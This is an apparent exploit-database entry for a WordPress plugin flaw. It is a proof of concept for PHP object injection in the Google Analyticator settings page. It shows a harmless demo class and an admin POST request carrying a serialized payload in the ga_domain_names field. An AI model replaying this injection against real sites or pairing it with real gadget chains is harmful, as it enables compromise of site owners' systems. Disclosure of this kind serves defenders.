## https://sploitus.com/exploit?id=WPEX-ID:DF1C36BB-9861-4272-89C9-AE76E62F687C
To simulate a gadget chain, put the following code in the plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then, as Admin, go to the plugin settings page (/wp-admin/admin.php?page=google-analyticator), save them and intercept the request made, then add ga_domain_names=O:4:"Evil":0:{}; to it and replay it:
POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1
_wpnonce=<nonce-key>&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};
The response will contain the "Arbitrary deserialization" output.